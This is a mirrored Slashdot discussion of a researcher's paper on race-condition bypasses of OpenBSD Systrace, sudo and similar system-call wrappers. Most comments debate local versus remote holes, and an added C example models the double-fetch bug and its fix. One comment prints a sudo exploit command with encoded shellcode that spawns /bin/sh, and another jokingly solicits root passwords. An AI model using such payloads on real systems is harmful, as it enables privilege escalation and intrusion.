Slashdot Mirror


Cambridge Researcher Breaks OpenBSD Systrace

An anonymous reader writes "University of Cambridge researcher Robert Watson has published a paper at the First USENIX Workshop On Offensive Technology in which he describes serious vulnerabilities in OpenBSD's Systrace, Sudo, Sysjail, the TIS GSWTK framework, and CerbNG. The technique is also effective against many commercially available anti-virus systems. His slides include sample exploit code that bypasses access control, virtualization, and intrusion detection in under 20 lines of C code consisting solely of memcpy() and fork(). Sysjail has now withdrawn their software, recommending against any use, and NetBSD has disabled Systrace by default in their upcoming release."

194 comments

  1. SELinux and the same ... by Gopal.V · · Score: 5, Informative

    James Morris has put up an analysis of the same vulnerabilities.

    And pushing the system code down into lower echelons of execution (i.e. kernel), the way SELinux does it, is a valid fix.

    1. Re:SELinux and the same ... by afidel · · Score: 5, Insightful

      I wonder what the performance penalty would be for thunking to kernel space on every such operation? If it was well implemented I would guess it would be minimal since you could just pass the call off to the called kernel object directly. I also wonder what if any security vulnerabilities would be exposed by moving that extra code into kernel space. I know for the TrustedBSD tools it would be minimal due to their strict code checking policies, but for other systems having this much extra code in kernel space might be a risk.

      --
      There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order. Starting now.
    2. Re:SELinux and the same ... by gwern · · Score: 1

      If the message-passing microkernels are any guide, thunking on every kernel call could be very expensive unless you go to great lengths (like L4) to avoid it.

    3. Re:SELinux and the same ... by makomk · · Score: 2, Informative

      Just putting the validation code in the kernel is not, by itself, sufficient - it's important that any arguments are copied from userspace exactly once. If the validation code and the actual syscall code each do their own copy from userspace, this is a potentially exploitable security issue.

    4. Re:SELinux and the same ... by Jokkey · · Score: 2, Informative

      I wonder what the performance penalty would be for thunking to kernel space on every such operation?

      What's being discussed here is system call wrapping, and system calls by definition go to kernel space anyway. No extra thunk to kernel space is required.

    5. Re:SELinux and the same ... by DrSkwid · · Score: 0, Flamebait

      > I know for the TrustedBSD tools it would be minimal due to their strict code checking policies

      I hope that works out for them because "Secure by default" and "Unbreakable" are amusing rhetoric.

      --
      There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
  2. Linux? by morgan_greywolf · · Score: 3, Insightful

    Any word if any of these vulnerabilities affect Linux or other Unixes as well?

    1. Re:Linux? by Anonymous Coward · · Score: 0

      If you use systrace on Linux, yes. I can't think of any mainstream distributions that ship systrace, though, so I believe this vulnerability is a non-issue for the Linux crowd. As for other unices - I have no idea, but I doubt it. OpenBSD's sudo is vulnerable because it has a systrace monitor mode, but sudo on Linux doesn't - so it should be ok.

  3. Apposite by frisket · · Score: 0, Offtopic

    Offensive Technology

    Microsoft Windows?

    1. Re:Apposite by Anonymous Coward · · Score: 0
  4. Since NetBSD seems to be affected as well... by bomanbot · · Score: 1

    are other UNIX-based Operating Systems vulnerable as well? Systrace and especially Sudo are very common in nearly all UNIX-like Systems, so maybe Linux and MacOS X users should also be concerned? And what about Windows, since commercially available anti-virus systems are also afflicted? That seems like a very serious vulnerability to me...

    1. Re:Since NetBSD seems to be affected as well... by makomk · · Score: 1

      Only an experimental feature in a prerelease version of sudo is affected by this vulnerability; normal users of sudo have nothing to worry about.

    2. Re:Since NetBSD seems to be affected as well... by ratboy666 · · Score: 2, Informative

      Given that the vulnerability exploited is a system call race, it may be that the "unwrapped" system calls may be exploited as well.

      Basically, wrapping the call (supposed to increase security) makes the race more exploitable. It is NOT "sudo" that is at fault, specifically, because sudo (in its current release) does not do call wrapping.

      There is an easy solution available -- simply disallow all execution between the time the system call is invoked, and all parameters have been copied to system space. Alternatively, do not allow threading, and mapping of memory used for parameters in an active call (a bit more difficult).

      A security audited system call interface is needed, along with a prohibition on wrapping system calls expected by an application (because those wraps could be exploited by an attacking program).

      And you are right -- Windows is probably more vulnerable to this, simply because there are more system calls that use buffer pointers.

      But this entire class of exploit is "local only", which means that the system needs to be compromised another way first; this can be used to obtain root, or use unauthorized resources.

      SELinux can be used to prevent much of the damage possible, as can Trusted Solaris. I don't know if there is a Windows equivalent.

      --
      Just another "Cubible(sic) Joe" 2 17 3061
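
The race that makomk ("copy from userspace exactly once") and ratboy666 ("disallow execution until all parameters have been copied") are describing, as an added example that is not code from the paper, this thread, Systrace, or any kernel: a toy in-process model in which a wrapper that fetches its argument twice sits beside one that fetches it once. The `racer_fn` hook, the `/tmp/` policy, and the path names are constructed for illustration and stand in for the other thread or process that rewrites the argument between the check and the kernel's copy.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Toy, single-process model of a system-call wrapper (constructed for this
 * example; not Systrace's or any kernel's code).  The "user" passes a path
 * by pointer; the wrapper decides whether the call is allowed and the
 * "kernel" then acts on the path.  The racer hook stands in for another
 * execution context that can rewrite user memory while the call is in
 * flight. */

#define PATH_LEN 64

typedef struct {
    char path[PATH_LEN];     /* lives in "user memory", shared with the racer */
} user_args;

typedef void (*racer_fn)(user_args *);

typedef struct {
    bool allowed;
    char acted_on[PATH_LEN]; /* what the "kernel" actually operated on */
} call_result;

/* Bounded copy modelling copyin(): one fetch from user memory. */
static void copyin(char *dst, const user_args *ua) {
    snprintf(dst, PATH_LEN, "%s", ua->path);
}

/* Toy policy: only paths under /tmp/ are permitted. */
static bool policy_allows(const char *path) {
    return strncmp(path, "/tmp/", 5) == 0;
}

/* BUGGY pattern: the wrapper and the kernel each fetch the argument, so a
 * change to user memory between the two fetches means the value that was
 * checked is not the value that is used (a double fetch / TOCTOU race). */
call_result wrapped_call_double_fetch(user_args *ua, racer_fn racer) {
    call_result r = { false, "" };
    char check_copy[PATH_LEN], kern_copy[PATH_LEN];

    copyin(check_copy, ua);                 /* fetch #1: the wrapper's */
    if (!policy_allows(check_copy))
        return r;
    if (racer)                              /* window before the kernel's copyin */
        racer(ua);
    copyin(kern_copy, ua);                  /* fetch #2: the kernel's */
    r.allowed = true;
    snprintf(r.acted_on, PATH_LEN, "%s", kern_copy);
    return r;
}

/* FIXED pattern: fetch exactly once, then both the check and the action use
 * that private copy.  User memory may still change underneath, but nothing
 * reads it a second time. */
call_result wrapped_call_single_fetch(user_args *ua, racer_fn racer) {
    call_result r = { false, "" };
    char kern_copy[PATH_LEN];

    copyin(kern_copy, ua);                  /* the only fetch */
    if (racer)                              /* same window, now harmless */
        racer(ua);
    if (!policy_allows(kern_copy))
        return r;
    r.allowed = true;
    snprintf(r.acted_on, PATH_LEN, "%s", kern_copy);
    return r;
}

/* Constructed racer: rewrites the argument after the wrapper's check. */
static void rewrite_argument(user_args *ua) {
    snprintf(ua->path, PATH_LEN, "%s", "/etc/passwd");
}

/* 1 if the double-fetch wrapper approved "/tmp/ok" but acted on "/etc/passwd". */
int double_fetch_acts_on_unchecked_path(void) {
    user_args ua;
    snprintf(ua.path, PATH_LEN, "%s", "/tmp/ok");
    call_result r = wrapped_call_double_fetch(&ua, rewrite_argument);
    return r.allowed && strcmp(r.acted_on, "/etc/passwd") == 0;
}

/* 1 if the single-fetch wrapper acts only on the path it actually checked. */
int single_fetch_acts_on_checked_path(void) {
    user_args ua;
    snprintf(ua.path, PATH_LEN, "%s", "/tmp/ok");
    call_result r = wrapped_call_single_fetch(&ua, rewrite_argument);
    return r.allowed && strcmp(r.acted_on, "/tmp/ok") == 0;
}

int main(void) {
    printf("double fetch acts on an unchecked path: %d\n",
           double_fetch_acts_on_unchecked_path());
    printf("single fetch acts on the checked path:  %d\n",
           single_fetch_acts_on_checked_path());
    return 0;
}
```

The same single-fetch discipline is what makes in-kernel enforcement such as SELinux immune to this class of bug: the check and the action see one copy of the argument.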
    3. Re:Since NetBSD seems to be affected as well... by SpaceLifeForm · · Score: 1

      Windows equivalent: Shut Down

      --
      You are being MICROattacked, from various angles, in a SOFT manner.
    4. Re:Since NetBSD seems to be affected as well... by Znork · · Score: 1

      Most security applications implemented as system call wrappers would be vulnerable (basically anything where there's an opportunity to modify the checked system call post-check by tricking today's modern and eminently interruptible kernels into doing something else than getting on with executing the syscall for a few cycles), although I suspect that anyone running sudo as primary security enforcement and logging application isn't exactly worried about this level of fairly arcane exploits (note that more low-level solutions like SELinux are not affected).

      More interesting would be whether it means that commercial security software like CA's eTrust access control is also inherently ehm, untrustable. It certainly sounds like it would be.

  5. so much for... by Fyre2012 · · Score: 0, Flamebait

    ...Only two remote holes in the default install, in more than 10 years!

    It's unfortunate too though, considering that OpenBSD is heralded as one of the most secure *nix's around. Looks like it's patch time for many.

    --
    This is not the greatest .sig in the world, no. This is just a tribute.
    1. Re:so much for... by NeoTerra · · Score: 1

      I'm scared when something complex has no patches. Then again I'm more scared when something complex has a LOT of patches.

    2. Re:so much for... by MrNaz · · Score: 5, Funny

      Why didn't you just say "I'm scared." ?

      --
      I hate printers.
    3. Re:so much for... by ArwynH · · Score: 4, Informative

      And it still only has had two remote holes in the default install in more than 10 years. This isn't a remotely exploitable hole, it allows privilege escalation, which requires access to the system and thus is a local hole. It's still a whopper of a hole though...

    4. Re:so much for... by orclevegam · · Score: 1

      Because sometimes I guess the patch level is "just right"?

      --
      Curiosity was framed, Ignorance killed the cat.
    5. Re:so much for... by Anonymous Coward · · Score: 0

      This idea that only holes in the default install count is kind of silly. If there's a remote hole in the FTP server then it certainly is an issue for people who want to run the FTP server.

    6. Re:so much for... by teknopurge · · Score: 3, Insightful

      Then choose a better FTP server - it's not OpenBSD's fault you installed pr00tme-ftpd.

      I can also publish a root password for my servers on digg. Does that mean it's OpenBSD's fault for that 'exploit' as well?

      The purpose of the default install is a configuration that has been audited by _the_ most anal development team on the planet. This is nothing but a good thing, and if people have a problem with Theo's attitude, feel free to fork the codebase.

      On my list of the 10 best OSS projects, OpenBSD is in the top 5.

    7. Re:so much for... by EvanED · · Score: 5, Funny

      On my list of the 10 best OSS projects, OpenBSD is in the top 5.

      In other words... it's in your list of the 5 best OSS projects.

      (sorry)

    8. Re:so much for... by DrSkwid · · Score: 2

      OpenBSD auditing isn't the god of all auditing you think it is.

      This is just another piece of audited code that roots you.

      --
      There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
    9. Re:so much for... by Hatta · · Score: 1

      It's a marketing slogan, of course it's silly. "Only two remote holes in the default install, in more than 10 years!" means about as much as "99 44/100 percent pure."

      --
      Give me Classic Slashdot or give me death!
    10. Re:so much for... by Anonymous Coward · · Score: 0

      He's talking about apps that come with OpenBSD but are inactive by default.

      By your logic people should just ship unix with the boot loader and kernel and claim to be the most secure OS in the universe.

    11. Re:so much for... by pathological+liar · · Score: 1

      That's one of the things that bugs me about OpenBSD: the ludicrous distinction between local and remote root exploits.

      Yeah, maybe you've got some ultra-locked down OpenBSD machine that doesn't actually do anything, but for most users, that latest phpBB bug that you ignored? It just effectively made the latest local kernel exploit a remote hole. For almost all users, the differentiation between local and remote holes is blurry at best. Minor vulnerabilities can and will be chained together to create a big problem.

      ... but that's okay, this is just a local hole, right?

    12. Re:so much for... by Plutonite · · Score: 1

      On my list of the 10 best OSS projects, OpenBSD is in the top 5.

      In other words... it's in your list of the 5 best OSS projects.

      (sorry) Mod parent up! In security related topics nitpicking is encouraged. No apology needed.

      PS: Can we have the list please? They are always interesting and provide good flamewar material.
    13. Re:so much for... by teknopurge · · Score: 2, Insightful

      well-played old chap.......... ;)

    14. Re:so much for... by turing_m · · Score: 1

      You ruined his build up!

      It's not just in the top thousand OSS projects. It's not only in the top hundred. It's not even just in the top ten OSS projects. It's in the TOP FIVE! Not only does it have ls, cat, grep and sed, if you order within the next 5 minutes we'll even throw in openssh free!

      --
      If I have seen further it is by stealing the Intellectual Property of giants.
    15. Re:so much for... by jimicus · · Score: 2, Insightful

      Let's be reasonable about this for a moment.

      Once someone has the power to execute arbitrary code on your system, then it is arguably only a matter of time before they can do what they please on it. Which is precisely why you don't use the same OpenBSD box for your firewall as you do for giving users a shell account on a Unix box.

    16. Re:so much for... by Anonymous Coward · · Score: 0

      It's only a local exploit if you use something that uses it. By default, nothing uses systrace.

    17. Re:so much for... by jpkunst · · Score: 1

      On my list of the 10 best OSS projects, OpenBSD is in the top 5.

      In other words... it's in your list of the 5 best OSS projects.

      (sorry)

      In other words ... it's at number 5. (If it was at number 4, he would have said is in the top 4, etc.)

      JP

  6. What should individual users do by Anonymous Coward · · Score: 0

    The article says that vendors have been given 6 months - several years notice.
    Does anyone know what OpenBSD has done, or what individuals who use OpenBSD should
    do in light of this article? Specific instructions please!

    1. Re:What should individual users do by bberens · · Score: 1

      The workaround is very complex. Send your IP and root password to pwnd@dodgeit.com and I'll take a look at your system to help make recommendations.

      --
      Check out my lame java blog at www.javachopshop.com
  7. I'm not worried by Gazzonyx · · Score: 2, Funny

    I'm not worried about a vuln. in sudo; I always log in as root and don't have sudo running :). Remember, Real Programmers log in as root. Take that h4x0rz!

    --

    If I mod you up, it doesn't necessarily mean I agree with what you've said, sorry.

    1. Re:I'm not worried by eno2001 · · Score: 5, Funny

      You know the old saying... "you get what you stay for". As long as you're logging in as root you will damage your system. It's a known fact. Anyone who logs in as root eventually dostoyevsky's their system. Logging in as root is dangerous. Even using 'su -' is dangerous. 'sudo' provides some level of security and accountability but even that is dangerous. I can't tell you how many times I've seen people type 'sudo bash' and then tool around doing everything as root all the time. The only way to really be safe is to never use any super user abilities whatsoever. The way I've handled it is that any time I run into something that I need root access for, I just give up. So I don't have any new users other than the ones I originally set up when I installed Ubuntu. I also don't have any access to the CD-RW drive built into the system, but that's OK since I'm not an illegal music and software pirate (only pirates use CD-R/CD-RW). I can't use the attached scanner that once worked in Windows 98 but that's OK since there is no need to scan photos or anything in Linux since there are no apps with which to work on them anyway. Whenever the system pops up asking me for the root password I just cancel out and stick with whatever settings the system had. Basically for me, a request for the root password is a threat to the security of my PC, myself and possibly the nation or even global security. So in short DO NOT EVER USE root access of ANY kind. It's very dangerous and best left to the experts (bearded and bald scientists in dusty university halls).

      --
      -"...bad old ideas look confusingly fresh when they are packaged as technology" - Jaron Lanier (Digital Maoism on Edge.o
    2. Re:I'm not worried by Anonymous Coward · · Score: 0

      I bet you were modded troll just because of that lame ass saying.

      Next time try: "With great power comes great responsibility." -Spider-Man

    3. Re:I'm not worried by DrSkwid · · Score: 1

      The successor to Unix got rid of root altogether from the OS.

      I prefer a boast like "Nothing to escalate" than "Secure by default"

      --
      There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
    4. Re:I'm not worried by nuzak · · Score: 1

      > Anyone who logs in as root eventually dostoyevsky's their system.

      I'm unfamiliar with Dostoyevsky as a verb. Explain?

      > So in short DO NOT EVER USE root access of ANY kind.

      I agree. That's why the OS should drop it entirely. Plan9 did. And MLS systems get one thing right: the role that's able to alter security contexts itself has virtually no access to anything else.

      --
      Done with slashdot, done with nerds, getting a life.
    5. Re:I'm not worried by Anonymous Coward · · Score: 0

      I'm running Windows 95, so I don't need to worry about this vulnerability.

    6. Re:I'm not worried by Anonymous Coward · · Score: 0

      or 'sudo su -' if sudo is not setup and configured properly...

    7. Re:I'm not worried by An+ominous+Cow+art · · Score: 1

      You're living on the edge, man. Don't you realize that by logging in as a user, any user, you put your precious files and data at risk? That's why the only wise decision, when faced by that "login:" or "Username" prompt, is to shut the machine down and just walk away. It's not worth it.

    8. Re:I'm not worried by empaler · · Score: 1

      Anything using more than 10W is a security risk to your data.

    9. Re:I'm not worried by bl8n8r · · Score: 3, Funny

      Thank God! A user that finally gets security! Look at those pigs wizzin by...

      --
      boycott slashdot February 10th - 17th check out: altSlashdot.org
    10. Re:I'm not worried by Anonymous Coward · · Score: 0

      idiotic!

    11. Re:I'm not worried by Alsee · · Score: 1

      WHAT IN HELL IS THIS THING?
      It's called a 'snowball' sir.

      -

      --
      - - You can't take something off the Internet! That's like trying to take pee out of a swimming pool.
    12. Re:I'm not worried by agbinfo · · Score: 1

      "With great power comes great responsibility." -Spider-Man
      Wasn't it Ben Parker who said that?
  8. No need for alarm! by Antarius · · Score: 5, Funny

    The tremors that you are feeling are from the sounds of the collective users of OpenBSD all simultaneously shouting "Fuck!" in exasperation.

    1. Re:No need for alarm! by nateb · · Score: 5, Funny
      The tremors that you are feeling are from the sounds of the collective users of OpenBSD all simultaneously shouting "Fuck!" in exasperation.

      All twelve of them. :)

      I like the thought of openbsd, though, having never used it. I'm sure everything will be fine.

      --
      -- Nate
    2. Re:No need for alarm! by Anonymous Coward · · Score: 0

      Both of them?

    3. Re:No need for alarm! by Dan+Ost · · Score: 1

      OpenBSD is my favorite platform for purpose-built machines. I do appreciate the security, but the main reason I like it is for the quality documentation (especially the man pages!) and the ease of setup.

      The majority of my machines run Gentoo, but Gentoo can't really be used as a fire-and-forget platform like OBSD can be.

      --

      *sigh* back to work...
    4. Re:No need for alarm! by guruevi · · Score: 0, Redundant

      I didn't know they could BOTH shout that loud.

      --
      Custom electronics and digital signage for your business: www.evcircuits.com
    5. Re:No need for alarm! by Antarius · · Score: 1

      They have big voices?

      "Pay no attention to the Pufferfish behind the curtain"

      And the most popular response to the halving of the OpenBSD userbase for humorous reasons:

      "It's a sign that OpenBSD is a Mature O.S. So mature that the userbase has gone through puberty!"


      [Whaddya mean "youdongeddit?" Puberty. You know; when a boy's balls drop. The voice gets lower... Aw, forget it.]

    6. Re:No need for alarm! by peacefinder · · Score: 5, Funny

      All twelve of them. :)

      We yell really loud.

      (And I actually yelled "Wow!". We're not a homogeneous lot.)

      --
      With reasonable men I will reason; with humane men I will plead; but to tyrants I will give no quarter. -- William Lloyd
    7. Re:No need for alarm! by MysteriousPreacher · · Score: 1

      That's 13 now, I just picked up the disks a little while ago.

      OpenBSD will never have the popularity or wide range of ports that FreeBSD has but it's a pretty solid system designed with a clear mandate. It's worth installing, even just to see the security decisions that have been taken so you can apply them to another Unix-like system. Like Dan Ost said, the documentation is excellent and the developers and mailing list users have been pretty helpful. The only thing I'm missing is WPA support.

      --
      -- Using the preview button since 2005
    8. Re:No need for alarm! by Dausha · · Score: 0

      This exploit was foreseen over 30 years ago by Obi-wan Kenobi:

      "What's wrong?" asked Luke.

      "It's as if millions of OpenBSD coders suddenly cried out in terror, and were suddenly silenced. I fear something dreadful has happened. You'd best disable sudo."

      --
      What those who want activist courts fear is rule by the people.
    9. Re:No need for alarm! by Anonymous Coward · · Score: 0

      How can five guys make that much noise

    10. Re:No need for alarm! by WyrdOne · · Score: 1

      Might want to do your research a bit more. OpenBSD is very useful for VPN Tunnels, Firewalls (some of the easiest to configure and most powerful), routers, etc.

      I run OpenBSD as a firewall OS and I challenge anyone to gain root on a similar setup; since it has no IPs on its interfaces it might be a bit hard.

      http://www.openlysecure.org/openbsd/how-to/invisible_firewall.html

    11. Re:No need for alarm! by empaler · · Score: 1

      I actually tried yesterday, but found the installation process to be too time-demanding of me (I just wanted a friggin' DHCP server)

    12. Re:No need for alarm! by aliquis · · Score: 1

      What? It takes 10-15 minutes to install and 2 to turn it into a DHCP server? Check the FAQ.

    13. Re:No need for alarm! by empaler · · Score: 1

      Took more than a minute to understand their partitioning scheme, too much trouble for the purpose.

    14. Re:No need for alarm! by aliquis · · Score: 1

      It's quite simple really, you first create a BSD slice, which is what you would call a partition in MS-DOS, then inside that one you put your partitions using disklabel. Partition a is always the root partition, b is always swap, c is the whole BSD slice, d is the whole disk, e-z is whatever you want them to be.

      And you could always let it use the whole disk if you want to.

    15. Re:No need for alarm! by empaler · · Score: 1

      And you could always let it use the whole disk if you want to.

      So it could actually work without a swap partition? (Swap on a DHCP-server?... Not really needed)
    16. Re:No need for alarm! by aliquis · · Score: 1

      The option "use entire disk" only sets it to one slice on the whole disk, you can still partition it in any other way if you want to, but just make no b-partition if that is what you want, or make one first and set a for whatever the rest is.

    17. Re:No need for alarm! by empaler · · Score: 1

      Just for your kindness of replying to me, I'll give it a shot next time I'm at the office.
      My vacation started today though, and I'll be pretty disconnected. (Betcha ten bucks I'll abuse any internet connection I can get near to browse /.)

    18. Re:No need for alarm! by empaler · · Score: 1

      (btw, your home page seems to be dead)

    19. Re:No need for alarm! by aliquis · · Score: 1

      It's been dead for a long time; the motherboard started to burn, so the machine is dead. It was quite boring anyway :D

      (I only posted "interesting stuff" and not diary kind of stuff, but I don't know how useful it was for other people anyway; also I decided to write in Swedish instead of English for most stuff.)

      All my much older webpages have been dead for a long time.

    20. Re:No need for alarm! by aliquis · · Score: 1

      Uhm, no Internet connection? Where do you live?

      100/10 here ;/

    21. Re:No need for alarm! by empaler · · Score: 1

      Hehehe... I live just across on the other side of Øresund; but I'm going on holiday to the southern end of the country (Møn, if you know Danish geography).
      A whole week where I don't have to think about system uptime :-D

  9. no by rubycodez · · Score: 0, Troll

    these are exploits for a local user on the system, anyone who puts a machine on the internet and lets people log into actual Unix accounts deserves what they get.

    1. Re:no by Anonymous Coward · · Score: 2, Insightful

      What if you can get a user shell by using an exploit in (firefox|x-chat|bind|apache|ftp|ssh|sendmail|ntp|whatever open port)?
      Guess you get what you deserve when you put a machine on the internet.

      Sure it is only an unprivileged local user, what could you do with that.

      Oh, wait. You could get root if you had a local user using an other exploit.

    2. Re:no by Steve+Baker · · Score: 5, Funny

      Exactly, why would anyone want to put a computer on the internet? That's just stupid!

    3. Re:no by Hatta · · Score: 1

      Why? Isn't that what multiuser networked operating systems are for?

      --
      Give me Classic Slashdot or give me death!
    4. Re:no by Anonymous Coward · · Score: 0

      And a poorly written server side script has never given base level access to the underlying machine to remote users?

    5. Re:no by shadowmas · · Score: 2

      these are exploits for a local user on system, anyone who puts a machine on the internet and lets people log into actual Unix accounts deserves what they get.

      Unless of course they did it because they live in the real world and actually have a practical requirement that needs that to be done.

      While we're disabling any form of shell access for any reason whatsoever, why not stop all those HTTP servers as well and the SMTP, DNS and all that crap as well. After all anybody who dares expose such a system on the internet when history tells us that there will be new vulnerabilities found in those software is obliviously an idiot.
    6. Re:no by rubycodez · · Score: 1

      actually, no, if you're providing services for untrusted users. the user authenticates to and uses a service, but never to a machine account to possibly run code on the machine. Local users ALWAYS can mess up a machine; there's no end to the ways they can do it.

    7. Re:no by rubycodez · · Score: 1

      If someone has a need for a local account on a machine, or any ability to run arbitrary code, you're in the same realm as a company hiring an employee and trying to verify whether they are trustworthy or not. A local user can always cause problems if they so choose. Just like anyone with physical access can cause even more problems.

    8. Re:no by krack · · Score: 1

      obliviously an idiot.

      I has a new favorite word!
      --
      Just because you are not paranoid does not mean they are not out to get you.
  10. why give much of a crap by rubycodez · · Score: 2, Informative

    on local user/software exploits? my domains have over a thousand users, but no one logs into an account on the machine.

    1. Re:why give much of a crap by xaxa · · Score: 1

      I have SSH access to some machines I have webspace on (with Fasthosts, I think). I think they use GNU/Linux, but presumably there are people offering the same service but with BSD.

    2. Re:why give much of a crap by Alioth · · Score: 4, Insightful

      Local exploits are only a phpBB vulnerability from being a remote exploit. If you're running a hosting service, and you're not treating local vulnerabilities as seriously as remote ones, it's only a matter of time before your machine is pwned and becomes a spam zombie. I've seen it happen.

      If you allow scripting on your server, then you've essentially given your users shell access, anyway.

    3. Re:why give much of a crap by edunbar93 · · Score: 1

      Oh, that's easy. Because when an attacker breaks into someone's CMS (because your users most certainly do not read about security updates on software mailing lists, and there's no way in hell you even know what they're running), suddenly that attacker *does* have a login on that machine. They can now run software as the "httpd" user. This is the reason jail(8) was invented. And what do you know... they found a vulnerability in a certain version of jail.

      --
      "No problem. I have the capacity to do infinite work so long as you don't mind that my quality approaches zero."-Dilbert
    4. Re:why give much of a crap by teknopurge · · Score: 1

      very untrue.

      php, for example, has a disable_functions parameter that prevents scripts from doing things they should not be doing.

      I feel for the hosting companies that you have been with that do not audit their boxes.

      Regards,

    5. Re:why give much of a crap by rubycodez · · Score: 1

      bullshit, crap code by incompetent programmers causes input data to be executed, the scripting languages all have ways to flag data as tainted suspect and deal with it properly with no possibility of execution (e.g. sql injection attacks, etc.) Piss poor development practices will always lead to security breaches, and that goes for any language not just the scripting ones. The biggest and most damaging attacks have been due to sloppiness in the c/c++ realm (ooo, who would ever give us more data than we expected, etc.)

    6. Re:why give much of a crap by DrSkwid · · Score: 1

      If you sleep at night on the strength of PHP's codebase then you should make sure your phone is turned off to save you being woken by the "we've been rooted" call.

      --
      There are places where the networks are not touching,and there are places where they are-Boeing's Lori Gunter
    7. Re:why give much of a crap by isolenz · · Score: 0

      If you allow scripting on your server, then you've essentially given your users shell access, anyway.

      you have to remember that with openbsd, apache runs in a jail which, when set up right, limits the user to only the php functions which are currently enabled on the system (in the php case), without the ability to call (exec) other programs. Bundling that with a firewall running on the local machine that limits what traffic can be passed out (by states obviously, so it can't originate on the local machine and send out via port 25, for example) can be very effective against attacks, and mitigate problems if someone can get into the system (everyone should make sure that they know how to find people if they do get into the system in the first place though).

      Although, as your original statement says, any vulnerability should be addressed very seriously, and my response above does not make it alright to forget about these situations.

      just my two cents

    8. Re:why give much of a crap by teknopurge · · Score: 1

      I never implied that we rest everything on PHP's codebase. But using things like suexec, PHP's disable_functions parameter, and other isolation tools, I can leave my phone on all night without being concerned about that phone call.

  11. OpenBSD Security by pathological+liar · · Score: 4, Funny

    ... now if only this would lead to a little ego deflation and humility among OpenBSD developers.

    As long as I'm dreaming, I also want a pony.

    1. Re:OpenBSD Security by teknopurge · · Score: 1

      Parish that thought.

      Because of their egos, a fix is likely being commited to CVS as we speak.

    2. Re:OpenBSD Security by frenchbedroom · · Score: 3, Funny

      Parish that thought.

      You mean like, put it in a convent or something ? Oh no, I get it, you mean he should build a little chapel in memory of it, right ?

    3. Re:OpenBSD Security by widman · · Score: 1

      There are about a hundred active OpenBSD developers, spread all around the globe. Why do you talk like you know them? Why the insult?

      Slashdot crowd at its best, giving you 3 positive points total. It's sad.

    4. Re:OpenBSD Security by Arkham79 · · Score: 1
      --
      https://comerford.net
  12. No released version of sudo affected by millert · · Score: 5, Informative

    The sudo systrace support is part of an experimental feature ("monitor mode") not present in any of the real sudo releases (though the code is available via anonymous cvs). Given the deficiencies of systrace (and ptrace) it is unlikely that this feature will be present in any future sudo release.

      - todd

    1. Re:No released version of sudo affected by fimbulvetr · · Score: 1

      Hello Todd.

      Thanks for sudo, and thanks for this clarification.

    2. Re:No released version of sudo affected by Anonymous Coward · · Score: 0

      Someone upmod this guy, he's the developer of sudo.

    3. Re:No released version of sudo affected by Anonymous Coward · · Score: 0

      hi todd, remember me? ./sudo
      `perl -e 'print "-p h%h%h%h%h" .
      "A"x11188 .
      "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\ x07\x89\x56\x0f\xb8\x1b"
      "\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\ xd1\xcd\x80\x33\xc0\x40"
      "\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh" .
      "AAAAAAAAA" .
      "\xff\xff\xff\xff\x18\xeb\xff\xff\xff\xb4\xb6\x05\ x08\xa1\xdc\x06\x08%"'`
      `perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'`
      `perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'`
      `perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'`

      good times that.

    4. Re:No released version of sudo affected by psmears · · Score: 1

      Given the deficiencies of systrace (and ptrace) it is unlikely that this feature will be present in any future sudo release.

      That's a shame...

      Granted, as the paper shows, it's of no use as a feature for preventing your box from getting pwned. But it can still be useful: often I'm more worried about the system being brought down by local users with root access, than by external forces. These users can be trusted not to break things deliberately, or overwrite the logs, but not necessarily to remember everything they've recently done when something goes wrong. ("Oh, yeah, I deleted /etc/passwd. Didn't think it was important, so I didn't tell you I'd done it. Is that why I can't log in then?")

    5. Re:No released version of sudo affected by Anonymous Coward · · Score: 0
    6. Re:No released version of sudo affected by epine · · Score: 1

      Yes, as per usual, the tribalism reflex on this thread has shut down useful brain circuits in most of the posters. Gorged with tribalistic lust, the average post here seems to be able to consider only the issue of getting pwned, or the paranoid dichotomy between useful and secure, or the purportedly paltry size of the OpenBSD user base, or the irritating slogan at the top of the OpenBSD home page (which hardly negates their contributions to the security ecology since the inception of the project no matter how sour the partisan).

      The useful insight here is that systrace implemented on top of clone is a relatively pathetic defense against malicious adversaries. So be it. That's not the only scenario to consider. It could possibly be applied to remove setuid from a long running daemon process that only requires the secure call during startup, which could be arranged to occur with the single in single-user mode. It can be used as a research tool with an unfamiliar application to discover how many system calls it makes which require elevated security. It can be used to configure a systrace profile for an application that will eventually be ported to a secure, kernel-based implementation of syscall. Or it can be used as suggested, to help protect the system from unwitting blunders that might otherwise have remained possible.

      Given a choice, I think the OpenBSD would prefer to see secure applications written to drop privs for the client threads. In general terms, applying systrace to impose security after-the-fact is doomed to fall far short of deploying an application architected from a security standpoint to begin with.

      The BUGS entry at the bottom of the OpenBSD systrace man page makes it quite clear that, as presently implemented, this little piggy lives in a house of straw. Not the best foundation for retrofitting iron bars on the windows and doors, as the sysjail project has attempted to do.

    7. Re:No released version of sudo affected by Anonymous Coward · · Score: 0

      Isn't the right alternative to this to add a proper OS audit facility, such as found in every other major OS, including Windows, Solaris, FreeBSD, and even some Linux versions?

  13. Code isn't up (thank goodness) by xC0000005 · · Score: 1

    It appears he's removed the code from the presentation (though it still says it's present, I don't see it). Good.

    --
    www.voiceofthehive.com - Beekeeping and Honeybees for those who don't.
    1. Re:Code isn't up (thank goodness) by Anonymous Coward · · Score: 0

      you're not too brilliant, are you ?

      Thanks God.

  14. Ha Ha by UnknowingFool · · Score: 4, Funny

    Sweet justice! My Win98 boxes have finally protected me against a hole. I am invinci*^&#%
    $#%#^&&!#$@$

    [CONNNECTION LOST]

    --
    Well, there's spam egg sausage and spam, that's not got much spam in it.
  15. Brace for impact... by Mattintosh · · Score: 5, Funny

    Theo DeRaadt goes on a rampage in 5... 4... 3... 2...

    1. Re:Brace for impact... by Anonymous Coward · · Score: 1, Interesting

      De Raadt doesn't do Rampages, he only does games available via console, like Tetris, Hunt and Hangman.

